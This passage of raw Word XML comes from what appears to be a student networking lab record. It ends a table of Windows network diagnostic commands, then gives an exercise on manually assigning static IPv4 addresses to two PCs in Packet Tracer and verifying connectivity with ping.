            <w:r w:rsidRPr="00074E6B">
              <w:t>Shows all connections with associated process IDs (PIDs).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00074E6B" w:rsidRPr="00074E6B" w14:paraId="1E64EDE4" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26D62E28" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01B56936" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>ipconfig /release</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2791E455" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>ipconfig /release</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22F14EB3" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>Releases the system’s current IP address.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00074E6B" w:rsidRPr="00074E6B" w14:paraId="500576BA" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2106F489" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22DFE1CC" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>ipconfig /renew</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01E6012A" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>ipconfig /renew</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6FC7689E" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>Renews the IP address from the DHCP server.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00074E6B" w:rsidRPr="00074E6B" w14:paraId="34F6D5B2" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CA89BC0" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B6C2150" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>ipconfig /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t>flushdns</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E46F0FA" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>ipconfig /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t>flushdns</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7297647C" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>Clears the DNS resolver cache.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00074E6B" w:rsidRPr="00074E6B" w14:paraId="1C493132" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C70CFD3" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0EE1BA68" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t>pathping</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04B8D8DD" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t>pathping</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t xml:space="preserve"> &lt;hostname&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="426448C9" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t xml:space="preserve">Combines ping and </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t>tracert</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t xml:space="preserve"> for detailed network path and latency info.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00074E6B" w:rsidRPr="00074E6B" w14:paraId="19CDEA49" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3EF10D67" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="409BF1C6" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>telnet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39970C1A" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>telnet &lt;IP&gt; &lt;port&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72B80CBF" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>Tests connectivity to remote hosts via Telnet protocol.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="373C0FFC" w14:textId="3CF7DC96" w:rsidR="00B55643" w:rsidRPr="00B55643" w:rsidRDefault="00B55643" w:rsidP="00B55643">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F67C2F2" w14:textId="77777777" w:rsidR="00B55643" w:rsidRDefault="00B55643" w:rsidP="00B55643"/>
    <w:p w14:paraId="5FEF675D" w14:textId="77777777" w:rsidR="00B55643" w:rsidRDefault="00B55643" w:rsidP="00B55643"/>
    <w:p w14:paraId="1C3DCD73" w14:textId="77777777" w:rsidR="00097298" w:rsidRDefault="00097298" w:rsidP="00B55643"/>
    <w:p w14:paraId="288B5D8D" w14:textId="77777777" w:rsidR="00097298" w:rsidRDefault="00097298" w:rsidP="00B55643"/>
    <w:p w14:paraId="1B826539" w14:textId="77777777" w:rsidR="00097298" w:rsidRDefault="00097298" w:rsidP="00B55643"/>
    <w:p w14:paraId="540B3790" w14:textId="77777777" w:rsidR="00097298" w:rsidRDefault="00097298" w:rsidP="00B55643"/>
    <w:p w14:paraId="5FC2154E" w14:textId="77777777" w:rsidR="00097298" w:rsidRDefault="00097298" w:rsidP="00B55643"/>
    <w:p w14:paraId="3D6E1739" w14:textId="77777777" w:rsidR="00097298" w:rsidRDefault="00097298" w:rsidP="00B55643"/>
    <w:p w14:paraId="4B71E0CA" w14:textId="77777777" w:rsidR="00097298" w:rsidRDefault="00097298" w:rsidP="00B55643"/>
    <w:p w14:paraId="4DA71073" w14:textId="77777777" w:rsidR="00097298" w:rsidRDefault="00097298" w:rsidP="00B55643"/>
    <w:p w14:paraId="2C28A4B1" w14:textId="77777777" w:rsidR="00097298" w:rsidRDefault="00097298" w:rsidP="00B55643"/>
    <w:p w14:paraId="56F0B987" w14:textId="77777777" w:rsidR="00097298" w:rsidRDefault="00097298" w:rsidP="00B55643"/>
    <w:p w14:paraId="64F1900B" w14:textId="77777777" w:rsidR="00097298" w:rsidRDefault="00097298" w:rsidP="00B55643"/>
    <w:p w14:paraId="220DF658" w14:textId="77777777" w:rsidR="00097298" w:rsidRDefault="00097298" w:rsidP="00B55643"/>
    <w:p w14:paraId="13CC1ACC" w14:textId="77777777" w:rsidR="00B55643" w:rsidRDefault="00B55643" w:rsidP="00B55643"/>
    <w:p w14:paraId="20E81E1B" w14:textId="77777777" w:rsidR="00735351" w:rsidRDefault="00735351" w:rsidP="00B55643"/>
    <w:p w14:paraId="0F4CBE7B" w14:textId="77777777" w:rsidR="00B207D8" w:rsidRDefault="00B207D8" w:rsidP="00B55643"/>
    <w:p w14:paraId="20E847BE" w14:textId="77777777" w:rsidR="00370154" w:rsidRDefault="00370154" w:rsidP="00B55643"/>
    <w:p w14:paraId="70034C74" w14:textId="703A25BA" w:rsidR="00B207D8" w:rsidRDefault="001032E0" w:rsidP="001032E0">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00CA360B">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">LEARNING AND </w:t>
      </w:r>
      <w:r w:rsidRPr="001032E0">
        <w:rPr>
          <w:rStyle w:val="IntenseEmphasis"/>
        </w:rPr>
        <w:t>ASSIGNMENT</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA360B">
        <w:t xml:space="preserve"> OF IP ADDRESS MANUALLY TO COMPUTERS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAD2FCB" w14:textId="77777777" w:rsidR="00B207D8" w:rsidRDefault="00B207D8" w:rsidP="00B55643"/>
    <w:p w14:paraId="3F9F368C" w14:textId="16DFB228" w:rsidR="00B207D8" w:rsidRDefault="00FD2439" w:rsidP="00B55643">
      <w:r>
        <w:t>Ex. No</w:t>
      </w:r>
      <w:r w:rsidR="001032E0">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00E91133">
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5A8009" w14:textId="77777777" w:rsidR="001032E0" w:rsidRDefault="001032E0" w:rsidP="00B55643"/>
    <w:p w14:paraId="70B32337" w14:textId="5332957C" w:rsidR="00A575CE" w:rsidRPr="00A575CE" w:rsidRDefault="00A575CE" w:rsidP="00A575CE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A575CE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Aim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235AF556" w14:textId="77777777" w:rsidR="00A575CE" w:rsidRPr="00A575CE" w:rsidRDefault="00A575CE" w:rsidP="00A575CE">
      <w:r w:rsidRPr="00A575CE">
        <w:t>To manually assign IPv4 addresses, subnet mask, and default gateway to computers in a network and verify connectivity between hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0B696D" w14:textId="77777777" w:rsidR="001032E0" w:rsidRDefault="001032E0" w:rsidP="00B55643"/>
    <w:p w14:paraId="1A2C180B" w14:textId="18BBD409" w:rsidR="00604815" w:rsidRPr="00604815" w:rsidRDefault="00604815" w:rsidP="00604815">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00604815">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Introduction</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A323C2" w14:textId="2F4D00D2" w:rsidR="00604815" w:rsidRPr="00604815" w:rsidRDefault="00604815" w:rsidP="00604815">
      <w:r w:rsidRPr="00604815">
        <w:t xml:space="preserve">In computer networks, every device requires a unique IP address to communicate. Manual IP assignment (static IP) is when the IP address, subnet </w:t>
      </w:r>
      <w:r w:rsidR="001037FB" w:rsidRPr="00604815">
        <w:t>mask</w:t>
      </w:r>
      <w:r w:rsidR="001037FB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001037FB" w:rsidRPr="00604815">
        <w:t>are</w:t>
      </w:r>
      <w:r w:rsidRPr="00604815">
        <w:t xml:space="preserve"> set manually instead of using DHCP. This experiment helps understand addressing, subnetting, and basic connectivity verification using ping.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4170753D" w14:textId="77777777" w:rsidR="00B207D8" w:rsidRDefault="00B207D8" w:rsidP="00B55643"/>
    <w:p w14:paraId="1C3979E9" w14:textId="5378B3AA" w:rsidR="008078D1" w:rsidRPr="008078D1" w:rsidRDefault="003E39B7" w:rsidP="008078D1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008078D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Algorithm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6406942B" w14:textId="77777777" w:rsidR="008078D1" w:rsidRPr="008078D1" w:rsidRDefault="008078D1" w:rsidP="008078D1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008078D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Prepare network devices</w:t>
      </w:r>
      <w:r w:rsidRPr="008078D1">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6F1C1F" w14:textId="77777777" w:rsidR="008078D1" w:rsidRPr="008078D1" w:rsidRDefault="008078D1" w:rsidP="008078D1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008078D1">
        <w:t>Place 2 PCs and 1 switch (and router if using a gateway) in Packet Tracer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2096BDAF" w14:textId="77777777" w:rsidR="008078D1" w:rsidRPr="008078D1" w:rsidRDefault="008078D1" w:rsidP="008078D1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008078D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Connect devices</w:t>
      </w:r>
      <w:r w:rsidRPr="008078D1">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F7B61E" w14:textId="77777777" w:rsidR="008078D1" w:rsidRPr="008078D1" w:rsidRDefault="008078D1" w:rsidP="008078D1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008078D1">
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="008078D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Copper Straight-Through cable</w:t>
      </w:r>
      <w:r w:rsidRPr="008078D1">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27128B0B" w14:textId="77777777" w:rsidR="008078D1" w:rsidRPr="008078D1" w:rsidRDefault="008078D1" w:rsidP="008078D1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008078D1">
        <w:t>PC → Switch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6CFF4A" w14:textId="77777777" w:rsidR="008078D1" w:rsidRPr="008078D1" w:rsidRDefault="008078D1" w:rsidP="008078D1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008078D1">
        <w:t>Switch → Router (optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298A68A4" w14:textId="77777777" w:rsidR="008078D1" w:rsidRDefault="008078D1" w:rsidP="008078D1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008078D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Assign IP addresses</w:t>
      </w:r>
      <w:r w:rsidRPr="008078D1">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1618EB89" w14:textId="453D8FEA" w:rsidR="003858C2" w:rsidRDefault="003858C2" w:rsidP="003858C2">
      <w:pPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r>
        <w:t>IP Address: 192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5510A170" w14:textId="77777777" w:rsidR="003858C2" w:rsidRDefault="003858C2" w:rsidP="003858C2">
      <w:pPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r>
        <w:t>Subnet Mask: 255.255.255.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AF0453" w14:textId="758325DC" w:rsidR="009C7585" w:rsidRDefault="009C7585" w:rsidP="009C7585">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>IP Address: 192.168.1</w:t>
      </w:r>
      <w:r w:rsidR="00421019">
        <w:t>.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C45D153" w14:textId="77777777" w:rsidR="009C7585" w:rsidRDefault="009C7585" w:rsidP="009C7585">
      <w:pPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r>
        <w:t>Subnet Mask: 255.255.255.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EDB69A" w14:textId="77777777" w:rsidR="00B207D8" w:rsidRDefault="00B207D8" w:rsidP="00B55643"/>
    <w:p w14:paraId="05AE0F13" w14:textId="06D73458" w:rsidR="00543BF7" w:rsidRPr="00543BF7" w:rsidRDefault="007D4A59" w:rsidP="007D4A59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00543BF7" w:rsidRPr="007D4A59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Verify connectivity</w:t>
      </w:r>
      <w:r w:rsidR="00543BF7" w:rsidRPr="00543BF7">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018502FB" w14:textId="18CF93FD" w:rsidR="00543BF7" w:rsidRPr="00543BF7" w:rsidRDefault="00543BF7" w:rsidP="00543BF7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00543BF7">
        <w:lastRenderedPageBreak/>
        <w:t>On PC0 → Command Prompt → ping 192.168.1</w:t>
      </w:r>
      <w:r w:rsidR="007D4A59">
        <w:t>.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CFF7B3" w14:textId="49453F38" w:rsidR="00543BF7" w:rsidRPr="00543BF7" w:rsidRDefault="00543BF7" w:rsidP="00543BF7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00543BF7">
        <w:t>On PC</w:t>
      </w:r>
      <w:r w:rsidR="00092ED8">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00543BF7">
        <w:t xml:space="preserve"> → Command Prompt → ping 192.168.1</w:t>
      </w:r>
      <w:r w:rsidR="00C35388">
        <w:t>.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474B8801" w14:textId="77777777" w:rsidR="00B207D8" w:rsidRDefault="00B207D8" w:rsidP="00B55643"/>
    <w:p w14:paraId="7C819A8E" w14:textId="0986C188" w:rsidR="00400DC4" w:rsidRDefault="003E39B7" w:rsidP="00B55643">
      <w:r w:rsidRPr="003E39B7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A11C7E8" w14:textId="77777777" w:rsidR="003E39B7" w:rsidRDefault="003E39B7" w:rsidP="00B55643"/>
    <w:p w14:paraId="78F1F564" w14:textId="57231566" w:rsidR="00C97B20" w:rsidRDefault="00C97B20" w:rsidP="00B55643">
      <w:r w:rsidRPr="00C97B20">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77F8D832" wp14:editId="208AF6D1">
            <wp:extent cx="4753638" cy="2219635"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="124263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39860" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4753638" cy="2219635"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="13919869" w14:textId="77777777" w:rsidR="00B207D8" w:rsidRDefault="00B207D8" w:rsidP="00B55643"/>
    <w:p w14:paraId="18E63C7B" w14:textId="445F8357" w:rsidR="00DA6EED" w:rsidRDefault="00DA6EED" w:rsidP="00B55643">
      <w:r w:rsidRPr="00DA6EED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Attachment</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F753472" w14:textId="53662752" w:rsidR="00DA6EED" w:rsidRDefault="00F07FDB" w:rsidP="00B55643">
      <w:r>
        <w:object w:dxaOrig="1520" w:dyaOrig="987" w14:anchorId="01FC9E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pt;height:49.2pt" o:ole="">
            <v:imagedata r:id="rId9" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1025" DrawAspect="Icon" ObjectID="_1823145909" r:id="rId10"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDA57AC" w14:textId="3CD68620" w:rsidR="00B207D8" w:rsidRDefault="00C97B20" w:rsidP="00B55643">
      <w:r w:rsidRPr="00C97B20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Result</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBBC157" w14:textId="708692C1" w:rsidR="00C97B20" w:rsidRDefault="003C5CA1" w:rsidP="00B55643">
      <w:r w:rsidRPr="003C5CA1">
        <w:t>Manual IP addresses were successfully assigned to the PCs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E502E6D" w14:textId="77777777" w:rsidR="00B207D8" w:rsidRDefault="00B207D8" w:rsidP="00B55643"/>
    <w:p w14:paraId="5A59AE55" w14:textId="77777777" w:rsidR="00B207D8" w:rsidRDefault="00B207D8" w:rsidP="00B55643"/>
